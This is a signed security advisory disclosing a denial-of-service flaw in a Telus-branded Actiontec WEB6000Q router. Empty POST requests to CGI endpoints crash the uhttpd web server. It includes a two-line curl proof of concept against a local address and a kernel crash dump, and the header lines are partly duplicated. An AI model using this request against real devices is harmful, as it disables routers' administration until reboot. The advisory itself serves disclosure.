-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
### Device Details
Discovered By: Andrew Klaus (andrew@aklaus.ca)
Vendor: Actiontec (Telus Branded)
Model: WEB6000Q< -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
### Device Details
Discovered By: Andrew Klaus (andrew@aklaus.ca)
Vendor: Actiontec (Telus Branded)
Model: WEB6000Q
Affected Firmware: 1.1.02.22
Reported: July 2018
CVE: Not needed since update is pushed by the provider.
### Summary of Findings
By querying CGI endpoints with empty (GET/POST/HEAD) requests causes a
Segmentation Fault of the uhttpd webserver. Since there is no watchdog
on this daemon, a device reboot is needed to restart the webserver to
make any modification to the device.
### Proof of Concept:
$ curl -X POST -ik http://192.168.1.2/forgot_password.cgi
curl: (52) Empty reply from server
$ curl -X POST -ik http://192.168.1.2/forgot_password.cgi
curl: (7) Failed to connect to 192.168.1.2 port 80: Connection refused
### UART console output after attack:
<4>[ 726.578000] uhttpd/452: potentially unexpected fatal signal 11.
<4>[ 726.583000]
<4>[ 726.585000] Cpu 1
<4>[ 726.587000] $ 0 : 00000000 10008d00 00000000 00000000
<4>[ 726.592000] $ 4 : 00000000 00000000 00000000 00000000
<4>[ 726.598000] $ 8 : 81010100 3d3d3d3d 77a00000 f0000000
<4>[ 726.603000] $12 : 00000001 6570743a 202a2f2a 00416b5c
<4>[ 726.608000] $16 : 00000000 00000000 00000000 7fe14ebe
<4>[ 726.614000] $20 : 00404c84 775168a0 0046d470 0084ee6c
<4>[ 726.619000] $24 : 00000186 00411030
<4>[ 726.624000] $28 : 00464620 7fe12800 7fe12800 00416c20
<4>[ 726.630000] Hi : 000000c9
<4>[ 726.633000] Lo : 0001e791
<4>[ 726.636000] epc : 00411078 0x411078
<4>[ 726.640000] Tainted: P
<4>[ 726.643000] ra : 00416c20 0x416c20
<4>[ 726.647000] Status: 00008d13 USER EXL IE
<4>[ 726.652000] Cause : 00000008
<4>[ 726.655000] BadVA : 00000000
<4>[ 726.657000] PrId : 0002a080 (Broadcom BMIPS4350)
<4>[ 726.663000]
<4>[ 726.663000] Userspace Call Trace: process uhttpd, pid 452, signal
11
<4>[ 726.671000] [<00411078>] /sbin/uhttpd
<4>[ 726.674000] [<00416c20>] /sbin/uhttpd
<4>[ 726.678000] [<00416d68>] /sbin/uhttpd
<4>[ 726.682000] [<00407cd4>] /sbin/uhttpd
<4>[ 726.686000] [<00416c20>] /sbin/uhttpd
<4>[ 726.689000] [<0047cb94>] (unknown)
-----BEGIN PGP SIGNATURE-----
iQIzBAEBCAAdFiEE/rRUDraOzqmrp8tZoyRid8jQfpkFAlz9T/cACgkQoyRid8jQ
fpl0pQ/8Cy5KVRr9A21pitkXvN4tfSg2xLW3JPCM5u9YTVyat8/OXBJH4fFro0qg
lu47mquRCKEC98IqMfHDiiq7x75iAWTfGOtB3k9Kk4xfdtwdQP8yKy8do8dHr9No
FgmNh0+MFK0fvEju5hyzDDU7jBIAKAcjxQGU974B96ai+7p5yjm0rziwMVRK10UA
Bfc7kIZVAKTxvJkVtThBihkJ2+Szq33j+DwC1F64ePx++SZIJO+sHMY28MU/Kzdb
BmUUfhPQhla0pSZ1S1TTcOzNE+j7YrvQZ8mJ8fVJ7c/tOkG1u7xN/i8DpikF/46Z
nlmERr5wqRHvpsPsrmjEJPOnECRhcK9GRAlxiZJIXExzRv94hwJnGAMVXBqNw/81
GHhwnXW7efQpPNiuV9P9GnNiBuTL5I+eQR6aJn5rMl+h9em8+6YyU6Aguf+z5UJC
eBsaTRHIl6PReTCaBbZR7lOG2KqP485LM7bwDSFej0lRWStmrB624O48Qqr6wbDf
UW639RG4J7J1Qtoc+Gu8PgXcXWV9HY4KH1Edt4cSowveOn1LmQEsmFOeoBC5FKbQ
bIqB1uYTTjmO/ey/ysh2GbXkNym6xNJYa1RCZt+S0T0T/qPjPQa+IVO59lygQhtm
GHNRPP43+TkLyXhvWMjl4Ptat2b/gd99DMqO/VnLqrZEWD2rXx8=
=IEzI
-----END PGP SIGNATURE-----